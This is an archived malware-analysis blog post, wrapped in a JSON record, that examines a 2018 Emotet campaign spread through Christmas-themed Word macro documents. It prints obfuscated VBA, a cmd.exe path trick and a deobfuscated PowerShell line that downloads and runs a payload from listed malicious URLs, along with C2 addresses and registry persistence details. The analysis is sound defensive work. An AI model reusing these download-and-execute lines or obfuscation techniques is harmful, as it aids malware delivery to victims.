{
	"id": "11f31bc3-fb6c-4a7c-a748-644521329c44",
	"created_at": "2026-04-06T00:15:46.897102Z",
	"updated_at": "2026-04-10T03:21:59.36244Z",
	"deleted_at": null,
	"sha1_hash": "a8d99f4ff74abc22fb68d9fdc5550c5309c0f22c",
	"title": "The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 459328,
	"plain_text": "The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc\r\nBy Suleyman Ozarslan, PhD\r\nPublished: 2018-12-21 · Archived: 2026-04-05 21:03:04 UTC\r\nCybercriminals routinely exploit the holiday season to boost malware delivery, and themed lures are a proven way to drive clicks. We observed malicious documents that use festive filenames such as ChristmasCard.doc, Christmas-Greeting-Card.doc, Christmas-wishes.doc, and Christmas-Congratulation.doc. These files arrive through phishing emails or downloads that look like harmless greetings. Once opened, the documents attempt to fetch and execute a second-stage payload in the background.\r\nOur analysis shows these droppers retrieve Emotet, a modular banking trojan that now functions primarily as a high-volume downloader and loader for additional malware. After initial execution, Emotet establishes persistence, communicates with command and control, and can deliver follow-on payloads such as credential stealers and other banking trojans. The result is broader compromise that impacts government entities and organizations across both the private and public sectors, particularly during busy holiday periods when security teams are stretched and users are more likely to engage with seasonal content.\r\nInitial Access\r\nThe specific sample analyzed below is ChristmasCard.doc (SHA256: 1D751C9AA079CC2D42D07D7964D5FAE375127EFA6CA1AC2DFECFD481FE796FBC).\r\nWhen a victim opens the document, Microsoft Word asks whether to enable or disable macros. 
It reveals that a macro is embedded in the document.\r\nWhen a user opens the document, it claims that it was created in an earlier version of Microsoft Office and asks the victim to enable the content, which launches the code hidden in the macros.\r\nhttps://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html\r\nPage 1 of 7\n\nExecution\r\nThe VBA (Visual Basic for Applications) code in the embedded macro is given below:\r\n Function EiDJKjLt()\r\n On Error Resume Next\r\n kRZXpYi = Array(TXwzCHKXZ, WiFKpY, NTNqBN, Interaction.Shell(CleanString(nvTFDMcQuDSt\r\n Select Case vhWrwwLHwhINhj\r\n Case 21458470\r\n vtPEXawqKYqTzo = 205771406\r\n bJOUowYROCUnaEvkFGjfFijV = Oct(fhaIrJIBLlXViMzUwpUGL + CStr(FcGOrIzszdsmIRwIX + Log(2\r\n MsgBox (bJOUowYROCUnaEvkFGjfFijV)\r\n End Select\r\n End Function\r\n \r\nThe macro includes obfuscated VBA code to evade security controls. The most interesting part of the macro is:\r\n Interaction.Shell(CleanString(nvTFDMcQuDSt.TextBox1), 15 - 15)\r\n \r\nIn this malicious macro, the Interaction.Shell method runs the executable program written in TextBox1. However, TextBox1 is not seen by the victim; it is hidden in the document. We used the Debug.Print method to see the content of TextBox1 and obtained the following code, which is executed by the Interaction.Shell method:\r\n c:\\SzCTnucwEfW\\SbuaBlErrzYpl\\RdPspAGt\\..\\..\\..\\windows\\system32\\cmd.exe /c %ProgramData\r\n \r\nWe see heavily obfuscated code intended to make detection difficult; the only clear part of the code is c:\\SzCTnucwEfW\\SbuaBlErrzYpl\\RdPspAGt\\..\\..\\..\\windows\\system32\\cmd.exe. As seen in this part of the code, three random directories are added after c:\\ to bypass weak security controls, then three \\.. are added to traverse back to c:\\. 
Therefore, the obtained path is c:\\windows\\system32\\cmd.exe, which runs the subsequent commands. However, those commands are also obfuscated:\r\n\"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel\r\n \r\nThe second and third commands are interesting:\r\nfor /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!\u0026\u0026if %V==0 call %xJWn:~6%\"\r\n \r\nBriefly, these commands print the 497-character-long XhOY variable in reverse order.\r\nLet’s look at the XhOY variable:\r\n'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=i\r\nAnd the XhOY variable in reverse order:\r\npowershell $KSv='\\DfV'\\;$ohl=new-object Net.WebClient;$lIY='\\http://www.ideenweberei.com/L9NXvhd@http\r\nNow we can see that it is a PowerShell command, but it is obfuscated by using variable substitution and garbage variable assignments. Even so, we can reveal the following command by removing the garbage variables and substituting the values of the variables where they are used.\r\npowershell foreach($wFR in http://www.ideenweberei.com/L9NXvhd@http://www.capbangkok.com/p1SolwJv@htt\r\nBriefly, this command tries to download 150.exe from the following addresses, in the given order, via the Net.WebClient.DownloadFile method. Then, if the file is downloaded successfully, it executes the downloaded file by using the Invoke-Item cmdlet and exits the loop. 
It differentiates a successful file download by comparing the length of the file with -ge 80000 (-ge: greater than or equal to).\r\n http://www.ideenweberei.com/L9NXvhd\r\n http://www.capbangkok.com/p1SolwJv\r\n http://www.trinityriveroutfitters.com/W4CGsWIzI\r\n http://www.hayashitoysmart.com/add_favorites/XJJSoydNv\r\n http://cleeft.nl/60ILq1CgH\r\n \r\nWhen we started to examine the 150.exe file (SHA256: 5456471B260E664E9485D2CB8321D8E3B3033F700A5BDAAFC94E4BA8046FB87D), we realized that it is the infamous Emotet trojan.\r\nAs expected from an Emotet sample, it tries to download a file from the following locations:\r\n 213.120.119.231:8443\r\n 78.189.21.131:80\r\n 187.140.90.91:8080\r\n 81.150.17.158:50000\r\n 1.150.17.158:8443\r\n 201.190.150.60:443\r\n \r\nAfter a few failed attempts, it downloaded the archivesymbol.exe file (SHA256: 5DA7A92311FDA255EFAC52C6BFEBCED31BD584453F6BB4F8DE6CDD1B2505B00F) from 201.190.150.60:443 to the C:\\Users\\admin\\AppData\\Local\\archivesymbol\\ folder. Emotet artifacts usually mimic the names of known executables. 
In order to become persistent on the victim system, archivesymbol.exe adds its full path to the HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run key in the Registry.\r\nConclusion\r\nIn this wave of attacks, the Emotet trojan spreads by emails that lure victims into downloading a Christmas-themed Word document, which contains a macro that executes a PowerShell script to download a malicious payload. Commands in the macro are heavily obfuscated for defense evasion.\r\nWith the Email Threat Simulation (ETS) Module, Picus customers are able to test their network and client security systems' blocking performance against any malicious email, without waiting to be infected by malware such as Emotet.\r\nIn addition, using the Picus Endpoint Simulation Module (ESM), you can challenge your endpoint security controls against a wide range of threats, from basic attacks to Advanced Persistent Threats (APTs), with up-to-date attack techniques mapped to MITRE’s ATT\u0026CK framework.\r\nIn conclusion, you can continuously verify and improve your security measures by utilizing the most practical, quick-to-apply, and immediate mitigation actions provided by Picus.\r\nIf you want to know how your enterprise security devices are blocking these attacks, you can contact us at demo@picussecurity.com. 
Within a few hours, we can quickly report to you how your network security systems protect against Emotet and other current cyber attacks!\r\nProcess Graph\r\nMITRE’s ATT\u0026CK Techniques Observed\r\nInitial Access: T1193 Spearphishing Attachment; T1192 Spearphishing Link\r\nExecution: T1059 Command-Line Interface; T1086 PowerShell; T1035 Service Execution; T1106 Execution through API\r\nPersistence: T1060 Registry Run Keys / Startup Folder; T1050 New Service; T1137 Office Application Startup\r\nDefense Evasion: T1140 Deobfuscate/Decode Files or Information; T1112 Modify Registry; T1064 Scripting\r\nDiscovery: T1012 Query Registry; T1082 System Information Discovery; T1057 Process Discovery; T1010 Application Window Discovery\r\nCommand and Control: T1071 Standard Application Layer Protocol; T1065 Uncommonly Used Port\r\nIndicators of Compromise (IoC)\r\nDelivery Documents\r\nDropped Emotet Trojans\r\nURLs\r\nConnected IPs\r\nSource: https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html"
	],
	"report_names": [
		"the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434546,
	"ts_updated_at": 1775791319,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a8d99f4ff74abc22fb68d9fdc5550c5309c0f22c.pdf",
		"text": "https://archive.orkl.eu/a8d99f4ff74abc22fb68d9fdc5550c5309c0f22c.txt",
		"img": "https://archive.orkl.eu/a8d99f4ff74abc22fb68d9fdc5550c5309c0f22c.jpg"
	}
}